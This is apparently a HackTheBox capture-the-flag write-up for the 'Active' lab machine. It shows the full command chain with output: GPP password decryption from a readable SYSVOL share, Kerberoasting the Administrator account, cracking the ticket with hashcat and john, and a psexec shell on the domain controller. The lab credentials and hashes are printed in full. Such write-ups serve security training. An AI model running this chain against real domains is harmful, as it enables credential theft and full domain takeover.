HACKTHEBOX - ACTIVE
Lien : https://app.hackthebox.eu/machines/Active
Enumeration
We start with our usual nmap scan:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-27 11:13:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
SMB Enumeration
We will use crackmapexec to enumerate shares with a "null" account:
crackmapexec smb 10.10.10.100 --shares -u '' -p ''
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
We can connect anonymously, and a share called Replication is particularly interesting because we have read rights on it:
smbclient --no-pass //10.10.10.100/Replication
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (5.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.9 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (7.5 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \> exit
We have a set of downloaded GPOs, but one file named Groups.xml is especially interesting:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
This contains an obfuscated password, that of SVC_TGS: : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
A few quick definitions before moving on:
-
Group Policy Preferences (GPP) is a collection of client-side group policy extensions that provide preference settings for domain-joined computers running Microsoft Windows desktop and server operating systems (since Windows Server 2008)
-
GPO (Group Policy Object) is a group policy object that contains policy settings for users and computers in an Active Directory domain. GPOs are stored on domain controllers and applied to users and computers when they log in to the domain.
Settings defined by a GPO cannot be changed by the user. However, settings defined by GPP can be changed.
GPP settings are stored in the Groups.xml file in the domain controller's SYSVOL share.
GPO settings are also stored (in a different way) in the domain controller's SYSVOL share.
In summary:
| Feature | GPP | GPO |
|---|---|---|
| Scope | Sites, domains, organizational units | Sites, domains, organizational units |
| Priority | Applied after GPOs | Applied before GPPs |
| Storage | GPP stored in SYSVOL | GPO stored in SYSVOL |
| Year introduced | Windows Vista (2006) | Windows 2000 (2000) |
| Settings modifiable by user? | Yes | No |
The Groups.xml file is used to deploy users via GPP. It is available in the SYSVOL share.
This share is by default available for reading by all domain users, except guest and anonymous accounts.
The Groups.xml file is also used to add users to local groups, domain groups, or deploy computers within the domain.
A Printers.xml file is also available in the SYSVOL share, and is used to deploy printers, using the same mechanism.
The "GPP-Decryptor" tool can decrypt this password:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Passwords stored in the Groups.xml file are encrypted with AES-256-CBC, which would make the password virtually impossible to crack.
However, the encryption key was static (i.e. it was the same everywhere in the world) and public!!!
This created a major security issue because it was possible to decrypt the passwords with the public key. Microsoft has therefore released a security patch preventing password storage on GPP.
More information: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025
We can try to connect via Evil-WinRM, but without success.
We re-enumerate via SMB with the new account:
crackmapexec smb 10.10.10.100 --shares -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
We have a Users share, with the user flag in the SVC_TGS Desktop folder
Privilege escalation
Request a TGS
The account name obtained SVC_TGS puts us on the trail of a TGS. With the help of the impacket suite, we can look at all available TGSs:
The Ticket-Granting Service (TGS) is a component of the Kerberos Key Distribution Center (KDC) that issues a service ticket when a principal requests a connection to a Kerberos service. To obtain a service ticket in an Active Directory domain, you must first have a Ticket-Granting Ticket (TGT) for that domain.
The TGS exchange happens in two main steps:
-
The client sends a request to the KDC to obtain a ticket for the server. The client presents the TGT, a Kerberos authenticator, and the service principal name (SPN).
-
The KDC validates the TGT and authenticator. If they are valid, the KDC returns a service ticket and session key that the client can use to encrypt communication with the server.
GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-07-27 13:01:52.365747
We see that not only do we have an available TGS (concerning a CIFS), but also that the username is "administrator".
CIFS (Common Internet File System) is a network file system protocol used to provide shared access to files and printers between machines on a network.
Here, the SPN matters very little to us. What interests us is that the "Administrator" account is the user whose TGS mentions it.
Normally, we would have to request a TGT and then a TGS, but impacket does it automatically for us.
Here, any authenticated user can request a TGS and try to crack it.
GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -request
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-07-27 13:01:52.365747
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$37d4a98e9986e9496d014bede8980c33$108c590902b3043937a560a1a6b00b8a669c9378336bb51a19fdfca93e09056fa6c3dca1de502af07d1904c34aef9a86a17c26dcdaed7dae977a2825f20c649a2f82216d5caa9f152ee864c43d3a0bad19764772a378db2daeef0857d4b8c77661733468d99f108772769149964159eb696ba4ba344357ccc883892c7613adfb2ba38a2972ef72e67efd028b63d59d26f6ee8fefa35bffe0ca6be746c54c40d678ef17288d8f21498a8795d693533f1a015621f192df1ac728386c7a355d7c64ee4b644826d3dca988a7742db8d250dc419e8516c052afa09b23129deb0ac29f84006f05ab1bd0085d5e5885b1938a8d4cb387df38b1afd6455469771c16f252ef6d5972b2e00743ebd6a7cfe2617da96d98dcc9dcd331d009f0547ba8b60b73a96517725b294e59c0630d3e3d9837fed723ed302577c22d465fb0ac89afe0b088cee72b98314638381a64628977e410f16bf019dd75dea9905382fe4cc64435c7f89ab152dd8897b0266670cfa04b4ac3a6c17160a67a032258a2be1dd936c0f4a934ea86a61d0ed8d611f84f25d2c1297e08ffcafa524aa16a09526dcc3dc409c06392ad89374aa3e8dce2231b50d842ed4277e0f392d5a624e36f8ea56a8f001c5ed4a6ec1ae6040bce6a91dfbfc26f1d1ff720b7067c0261b2d97629e39030a9c842817b668d18176becc1b4a313ace0318101939b79fadbeb047100d46c6c5136b1df65a6e8867601511914b1fbf0ec1596b741f037c7309b9759b109b17e2a7ae38a9c1f72d1cd7a974fc7f741f4a3d8d68fb144994596da7e62cc73cf6f2118b6804459634bb7bb918d3905a7251f83fdfa4b03eed34bb55b4e276ffc479f4774295c40c3f063ae637bca1ffd4ef5819c55f4776694541beccbd6f76163cd6191039d286a7b556cccdbd8548523f1805c45631310057d7426ee90810e39540509a5baefba92632bcc57a6f6d36fe556b1734ad56621f7d9425e1fc47153b200c5158cda621b5d3b5ea01ee04d0c200d21fc5d5b21a215b510ab86ffde51a55b2ef484a58a158f71dce039479aa058c001075c46516a92d06189a8f7399145ce1ff476551a8c44bf15f10065ddb61e2cedca477385add154c3e69cf44c7c133c92b1dc3bed37f953fd615bf1b2797ba89f875f603c98d7c2e60bce5c872a4dc153a462f037695c250dea7532862f59b2dd2fc6cb70dcf49b17e005fb5365ed62660140dbe51507e0f2458cb808b68d0532eb61b43f546d
Here we were able to crack the TGS, notably because the encryption algorithm used is RC4.
RC4 is a stream cipher invented in 1987 and using a 64Bit or 128Bit key size. It is used in the SSL/TLS protocol, the WEP protocol, the WPA protocol and the Kerberos protocol.
If you get this error message:
[-] type object 'CCache' has no attribute 'parseFile'
You have an old impacket version (<0.10). Update the impacket suite.
Cracking the TGS
This TGS contains the administrator user's hash.
We then have 2 ways to crack it:
- With hashcat :
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$37d4a98e9986e9496d014bede8980c33$108c590902b3043937a560a1a6b00b8a669c9378336bb51a19fdfca93e09056fa6c3dca1de502af07d1904c34aef9a86a17c26dcdaed7dae977a2825f20c649a2f82216d5caa9f152ee864c43d3a0bad19764772a378db2daeef0857d4b8c77661733468d99f108772769149964159eb696ba4ba344357ccc883892c7613adfb2ba38a2972ef72e67efd028b63d59d26f6ee8fefa35bffe0ca6be746c54c40d678ef17288d8f21498a8795d693533f1a015621f192df1ac728386c7a355d7c64ee4b644826d3dca988a7742db8d250dc419e8516c052afa09b23129deb0ac29f84006f05ab1bd0085d5e5885b1938a8d4cb387df38b1afd6455469771c16f252ef6d5972b2e00743ebd6a7cfe2617da96d98dcc9dcd331d009f0547ba8b60b73a96517725b294e59c0630d3e3d9837fed723ed302577c22d465fb0ac89afe0b088cee72b98314638381a64628977e410f16bf019dd75dea9905382fe4cc64435c7f89ab152dd8897b0266670cfa04b4ac3a6c17160a67a032258a2be1dd936c0f4a934ea86a61d0ed8d611f84f25d2c1297e08ffcafa524aa16a09526dcc3dc409c06392ad89374aa3e8dce2231b50d842ed4277e0f392d5a624e36f8ea56a8f001c5ed4a6ec1ae6040bce6a91dfbfc26f1d1ff720b7067c0261b2d97629e39030a9c842817b668d18176becc1b4a313ace0318101939b79fadbeb047100d46c6c5136b1df65a6e8867601511914b1fbf0ec1596b741f037c7309b9759b109b17e2a7ae38a9c1f72d1cd7a974fc7f741f4a3d8d68fb144994596da7e62cc73cf6f2118b6804459634bb7bb918d3905a7251f83fdfa4b03eed34bb55b4e276ffc479f4774295c40c3f063ae637bca1ffd4ef5819c55f4776694541beccbd6f76163cd6191039d286a7b556cccdbd8548523f1805c45631310057d7426ee90810e39540509a5baefba92632bcc57a6f6d36fe556b1734ad56621f7d9425e1fc47153b200c5158cda621b5d3b5ea01ee04d0c200d21fc5d5b21a215b510ab86ffde51a55b2ef484a58a158f71dce039479aa058c001075c46516a92d06189a8f7399145ce1ff476551a8c44bf15f10065ddb61e2cedca477385add154c3e69cf44c7c133c92b1dc3bed37f953fd615bf1b2797ba89f875f603c98d7c2e60bce5c872a4dc153a462f037695c250dea7532862f59b2dd2fc6cb70dcf49b17e005fb5365ed62660140dbe51507e0f2458cb808b68d0532eb61b43f546d:Ticketmaster1968
- With john :
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2023-07-28 02:14) 0.3067g/s 3233Kp/s 3233Kc/s 3233KC/s Tiffani1432..Thanongsuk_police
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Gettin' a shell
On peut avoir ensuite le flag root via le share Users, mais il est également possible d'avoir un shell car nous avons les droits dans le share ADMIN$ :
We can then get the root flag via the Users share, but we can also get a shell because we have rights in the ADMIN$ share:
The ADMIN$ share is a hidden administrative share created by Windows NT family operating systems that allows system administrators remote access to every disk volume on a network-connected system.
It is created by default by Windows, and only administrators can access it.
crackmapexec smb 10.10.10.100 --shares -u 'administrator' -p 'Ticketmaster1968'
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.100 445 DC C$ READ,WRITE Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ,WRITE Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
We can then connect via psexec :
psexec.py "[email protected]"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file wEhOvcTJ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service xJLl on 10.10.10.100.....
[*] Starting service xJLl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Since connecting via evil-winrm was not possible, this allows us to get a shell anyway and retrieve the root flag !